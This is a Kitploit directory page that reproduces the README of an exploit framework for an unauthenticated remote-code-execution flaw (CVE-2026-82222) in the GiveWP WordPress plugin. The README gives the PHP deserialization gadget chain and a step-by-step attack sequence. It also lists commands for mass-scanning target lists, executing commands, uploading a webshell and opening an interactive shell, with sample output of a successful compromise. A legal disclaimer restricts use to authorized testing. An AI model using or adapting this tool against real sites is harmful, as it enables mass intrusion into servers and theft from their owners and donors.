Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-82222 — إطار عمل استغلال لـ CVE-2026-82222، وهو ثغرة تنفيذ برمجي عن بُعد (RCE) غير مصادق عليها في إضافة GiveWP الخاصة بووردبريس. يدعم الفحص الجماعي، والاكتشاف التلقائي، وتعدد الخيوط، وإخراج بصيغة JSON/TXT، وقشرة تفاعلية للاختبار المصرح به. | Kitploit
أدوات/GitHubGitHub/ghostlyrootb2h/cve-2026-82222
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHub
ghostlyrootb2h/cve-2026-82222

CVE-2026-82222

إطار عمل استغلال لـ CVE-2026-82222، وهو ثغرة تنفيذ برمجي عن بُعد (RCE) غير مصادق عليها في إضافة GiveWP الخاصة بووردبريس. يدعم الفحص الجماعي، والاكتشاف التلقائي، وتعدد الخيوط، وإخراج بصيغة JSON/TXT، وقشرة تفاعلية للاختبار المصرح به.

عرض المستودع
26منذ 20 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

⚡ GHOSTLYR00T - GiveWP RCE Exploit Framework

Python Version License Author CVE CVSS

CVE-2026-82222 - GiveWP Unauthenticated RCE Exploit
Mass Scanner + Auto-Detection + Multi-Threading + Interactive Shell


📋 Daftar Isi | Table of Contents

  • Overview
  • Fitur Utama | Key Features
  • Vulnerability Details
  • Instalasi | Installation
Parameter Lengkap | Complete Parameters
  • Contoh Penggunaan | Examples
  • Hasil Scan | Scan Results
  • How It Works
  • FAQ
  • Peringatan | Warning
  • Lisensi | License

  • 🎯 Overview

    GHOSTLYR00T هو إطار عمل استغلال لثغرة CVE-2026-82222، وهي ثغرة حقن كائنات PHP في إضافة GiveWP الخاصة بووردبريس والتي تتيح تنفيذ الأوامر عن بُعد (RCE) دون مصادقة. تدعم هذه الأداة المسح الجماعي والاكتشاف التلقائي والطرفية التفاعلية.

    🔴 CVSS 9.8 - حرجة (CRITICAL)

    Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H


    🚀 الميزات الرئيسية | Key Features

    🇮🇩 Bahasa Indonesia

    FiturDeskripsi
    Mass ScanScan ratusan target dari file (-f targets.txt)
    Auto-DetectionDeteksi otomatis form ID, gateway, dan amount donasi
    Multi-ThreadingScan paralel dengan thread configurable (--threads)
    Check ModeFingerprint cepat tanpa exploit (--check)
    JSON OutputExport hasil ke JSON (--json)
    TXT OutputExport hasil ke TXT ringkas (--txt)
    Interactive ShellUpload webshell + terminal interaktif
    Admin EscalationAuto-escalate user ke administrator
    Progress BarMonitor real-time proses scanning
    Colored OutputOutput dengan warna dan format profesional

    🇬🇧 English

    FeatureDescription
    Mass ScanScan hundreds of targets from file (-f targets.txt)
    Auto-DetectionAuto-detects form ID, gateway, and donation amount
    Multi-ThreadingParallel scanning with configurable threads
    Check ModeFast fingerprint without exploitation (--check)
    JSON OutputExport results to JSON (--json)
    TXT OutputExport results to TXT (--txt)
    Interactive ShellUpload webshell + interactive terminal
    Admin EscalationAuto-escalate user to administrator
    Progress BarReal-time scan progress monitoring
    Colored OutputProfessional colored terminal output

    🔍 تفاصيل الثغرة | Vulnerability Details

    CVE-2026-82222 - GiveWP Unauthenticated RCE

    AspekDetail
    Affected VersionsGiveWP <= 4.16.7.1
    Patched VersionsGiveWP >= 4.16.7.2
    Attack VectorNetwork (AV:N)
    Privileges RequiredNone (PR:N)
    ImpactComplete System Compromise

    POP Chain:

    root@kitploit:~
    TCPDF::__destruct()
      -> TCPDF::_destroy(true)
        -> foreach ($this->imagekeys as $file)
          -> Symfony Session::getIterator()
            -> Session::getBag($this->attributeName)
              -> $this->storage->getBag($attributeName)
                -> DonationFactory->__call('getBag', [$attributeName])
                  -> call_user_func_array('system', [$attributeName])
    

    📦 التثبيت | Installation

    🇮🇩 Bahasa Indonesia

    🔧 Persyaratan Sistem

    • OS: Linux / Windows / MacOS
    • Python: Versi 3.8 atau lebih baru
    • Library: requests, urllib3

    📥 Langkah Instalasi

    root@kitploit:~
    # 1. Clone repository
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. Install dependencies
    pip install requests urllib3
    
    # 3. Tes apakah berhasil
    python3 poc.py -h
    

    🇬🇧 English

    🔧 System Requirements

    • OS: Linux / Windows / MacOS
    • Python: Version 3.8 or higher
    • Libraries: requests, urllib3

    📥 Installation Steps

    root@kitploit:~
    # 1. Clone repository
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. Install dependencies
    pip install requests urllib3
    
    # 3. Test if successful
    python3 poc.py -h
    

    🎯 المعاملات الكاملة | Complete Parameters

    🇮🇩 Bahasa Indonesia

    ParameterFungsiContoh
    -f, --fileFile target (batch mode)-f targets.txt
    --threadsJumlah thread (default: 4)--threads 10
    --jsonExport hasil ke JSON--json hasil.json
    --txtExport hasil ke TXT--txt hasil.txt
    -c, --commandCommand yang dieksekusi-c "id"
    -g, --gatewayForce gateway tertentu-g stripe
    -a, --amountForce amount donasi-a 25.00
    -t, --triggersRetry attempts (default: 4)-t 5
    --timeoutTimeout per request (default: 30s)--timeout 60
    --checkFingerprint only--check
    --upload-shellUpload webshell--upload-shell
    -i, --interactiveInteractive terminal-i
    -v, --verboseVerbose output-v
    --no-colorDisable colored output--no-color

    🇬🇧 English

    ParameterFunctionExample
    -f, --fileTarget file (batch mode)-f targets.txt
    --threadsNumber of threads (default: 4)--threads 10
    --jsonExport results to JSON--json results.json
    --txtExport results to TXT--txt results.txt
    -c, --commandCommand to execute-c "id"
    -g, --gatewayForce specific gateway-g stripe
    -a, --amountForce donation amount-a 25.00
    -t, --triggersRetry attempts (default: 4)-t 5
    --timeoutRequest timeout (default: 30s)--timeout 60
    --checkFingerprint only--check
    --upload-shellUpload webshell--upload-shell
    -i, --interactiveInteractive terminal-i
    -v, --verboseVerbose output-v
    --no-colorDisable colored output--no-color

    🔥 أمثلة الاستخدام | Examples

    🇮🇩 Bahasa Indonesia

    1. Single Target

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. Batch Scan (Check Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt hasil_check.txt
    

    3. Batch Scan (Exploit Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json hasil.json --txt hasil.txt
    

    4. Interactive Shell

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. Verbose Mode

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    🇬🇧 English

    1. Single Target

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. Batch Scan (Check Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt check_results.txt
    

    3. Batch Scan (Exploit Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json results.json --txt results.txt
    

    4. Interactive Shell

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. Verbose Mode

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    📊 نتائج الفحص | Scan Results

    🇮🇩 Bahasa Indonesia

    Terminal Output (Berhasil Exploit)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.

    TXT Output (Check Mode)

    root@kitploit:~
    # GiveWP Vulnerability Scan Results (Fingerprint Mode)
    # Generated: 2026-09-09 12:00:00
    # Total: 10 | Vulnerable: 4 | Exploited: 0 | Failed: 6
    #
    # Format: TARGET | VERSION | STATUS
    #
    https://target1.com | 4.15.4 | VULNERABLE
    https://target2.com | 4.14.6 | VULNERABLE
    

    JSON Output

    root@kitploit:~
    {
      "timestamp": 1694265600,
      "mode": "exploit",
      "total": 10,
      "vulnerable": 4,
      "exploited": 3,
      "failed": 7,
      "results": [
        {
          "target": "https://target1.com",
          "status": "exploited",
          "version": "4.15.4",
          "command_output": "uid=33(www-data) gid=33(www-data)"
        }
      ]
    }
    

    🇬🇧 English

    Terminal Output (Successful Exploit)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.


    ⚙️ كيف يعمل | How It Works

    🇮🇩 Bahasa Indonesia

    الاستغلال خطوة بخطوة:

    1. بصمة الإصدار: اكتشاف إصدار GiveWP عبر readme.txt وgive.php
    2. التسجيل: إنشاء حساب متبرع بدون مصادقة عبر give_action=user_register
    3. تخزين الحمولة: تخزين كائن PHP مُسلسل في بيانات last_name الوصفية
    4. اكتشاف النماذج: العثور على نماذج التبرع عبر REST API والزحف
    5. الكشف التلقائي عن البوابة/المبلغ: اختبار مجموعات البوابة والمبلغ حتى النجاح
    6. تسميم الجلسة: إرسال تبرع بدون حقل give_last لتفعيل إلغاء التسلسل
    7. التفعيل والالتقاط: الوصول إلى الجلسة لإحياء الحمولة والتقاط المخرجات

    منطق الكشف التلقائي:

    root@kitploit:~
    # Gateway detection order
    CANDIDATE_GATEWAYS = ['manual', 'offline', 'paypal', 'stripe', 'square',
                          'paypalexpress', 'authorize', 'razorpay', 'mollie']
    

    Amount detection order

    AMOUNT_TESTS = ['0.01', '1.00', '5.00', '10.00', '25.00', '50.00', '100.00', '250.00', '500.00']

    🇬🇧 English

    Step-by-step Exploitation:

    1. Fingerprint: Detects GiveWP version via readme.txt and give.php
    2. Registration: Creates donor account via give_action=user_register
    3. Payload Storage: Stores serialized PHP object in last_name metadata
    4. Form Discovery: Finds donation forms via REST API and scraping
    5. Gateway/Amount Auto-Detection: Tests combinations until successful
    6. Session Poisoning: Submits donation without give_last to trigger deserialization
    7. Trigger & Capture: Accesses session to revive payload and capture output

    ❓ الأسئلة الشائعة

    🇮🇩 Bahasa Indonesia

    PertanyaanJawaban
    Versi GiveWP apa yang rentan?GiveWP <= 4.16.7.1. Versi 4.16.7.2 dan di atasnya sudah patched.
    Kenapa harus -a 25?Beberapa form punya minimum amount (misal $25). Tools auto-detect, tapi bisa di-force.
    Bisa digunakan di production?TIDAK. Hanya untuk authorized testing.
    Kenapa registrasi gagal (HTTP 200)?Target mungkin registrasi dimatikan, WAF aktif, atau versi 4.16.6+.

    🇬🇧 English

    QuestionAnswer
    Which GiveWP versions are vulnerable?GiveWP <= 4.16.7.1. Version 4.16.7.2 and above are patched.
    Why use -a 25?Some forms have minimum amounts. Tool auto-detects, but can be forced.
    Can this be used in production?NO. For authorized testing only.
    Why registration fails (HTTP 200)?Target may have registration disabled, WAF active, or version 4.16.6+.

    ⚠️ تحذير

    ⚠️ تحذير قانوني ⚠️

    هذه الأداة مخصصة لأبحاث الأمن فقط!


    ⚠️ غير قانوني: الوصول إلى الخوادم دون إذن = جريمة جنائية
    ⚠️ قانون الجرائم الإلكترونية: انتهاك المواد 30-32 المتعلقة بالوصول غير المصرح به
    ⚠️ للاستخدام المصرح به فقط: اختبار أنظمتك الخاصة أو بإذن كتابي
    ⚠️ المسؤولية: المستخدمون مسؤولون بالكامل عن استخدام هذه الأداة

    استخدم بحكمة ومسؤولية!

    ⚠️ LEGAL WARNING ⚠️

    THIS TOOL IS FOR SECURITY RESEARCH ONLY!


    ⚠️ Illegal: Accessing servers without permission = criminal offense
    ⚠️ Legal Risk: Violates computer fraud laws
    ⚠️ Authorized use only: Testing your own systems or with written permission
    ⚠️ Responsibility: Users are fully responsible for their use of this tool

    USE WISELY AND RESPONSIBLY!


    📜 الترخيص

    🇮🇩 Bahasa Indonesia

    Copyright © 2026 GhostlyrootB2H
    Didistribusikan di bawah lisensi MIT.

    🇬🇧 English

    Copyright © 2026 GhostlyrootB2H
    Distributed under the MIT License.


    👨‍💻 المؤلف

    GhostlyrootB2H

    🐙 GitHub: @GhostlyrootB2H

    🇮🇩 Terima kasih telah menggunakan GHOSTLYR00T!
    Tools ini untuk pembelajaran dan pengujian keamanan.
    Jangan gunakan untuk aktivitas ilegal!

    🇬🇧 Thank you for using GHOSTLYR00T!
    For learning and security testing only.
    Do not use for illegal activities!

    تنزيل الأداة